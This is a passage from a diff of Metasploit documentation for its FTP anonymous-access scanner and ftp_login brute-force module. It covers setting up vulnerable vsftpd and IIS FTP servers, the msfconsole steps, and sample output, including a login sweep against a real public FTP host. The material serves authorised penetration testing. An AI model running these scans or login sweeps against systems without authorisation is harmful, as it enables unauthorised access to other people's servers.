1. On the taskbar, click Start, and then click Control Panel.
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
3. Expand Internet Information Services, then FTP Server.
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
5. Click OK.
#### Enabling anonymous login on IIS
1. Open IIS Manager and navigate to the level you want to manage. ...
2. In Features View, double-click Authentication.
3. On the Authentication page, select Anonymous Authentication.
4. In the Actions pane, click Enable to use Anonymous authentication with the default settings.
## Verification Steps
1. Do: ```use auxiliary/scanner/ftp/anonymous```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Scenarios
### vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(anonymous) > set RPORT 21
RPORT => 21
msf auxiliary(anonymous) > exploit
[+] 127.0.0.1:21 - 127.0.0.1:21 - Anonymous READ (220 (vsFTPd 3.0.3))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(anonymous) >
```
## Confirming using NMAP
```
root@kali:~# nmap -sV -sC 127.0.0.1 -p 21
Starting Nmap 7.40SVN ( https://nmap.org ) at 2017-04-24 22:58 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
Service Info: OS: Unix
root@kali:~#
```

63
documentation/modules/auxiliary/scanner/ftp/ftp_login.md Normal file
View File

@ -0,0 +1,63 @@
## Description
This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
## Vulnerable Application
### Install ftp server on Kali Linux:
1. ```apt-get install vsftpd```
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
```
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
```
3. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
4. ```service vsftpd start```
### Installing FTP for IIS 7.5 in Windows:
#### IIS 7.5 for Windows Server 2008 R2:
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
6. Click Next.
7. On the Confirm Installation Selections page, click Install.
8. On the Results page, click Close.
#### IIS 7.5 for Windows 7:
1. On the taskbar, click Start, and then click Control Panel.
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
3. Expand Internet Information Services, then FTP Server.
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
5. Click OK.
## Verification Steps
1. Do: ```use auxiliary/scanner/ftp/ftp_login```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Scenarios
```
msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org
msf auxiliary(ftp_login) > set USERNAME ftp
msf auxiliary(ftp_login) > set PASSWORD hello@metasploit.com
msf auxiliary(ftp_login) > run
[*] 129.128.5.191:21 - Starting FTP login sweep
[+] 129.128.5.191:21 - LOGIN SUCCESSFUL: ftp:hello@metasploit.com
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_login) >
```

Some files were not shown because too many files have changed in this diff Show More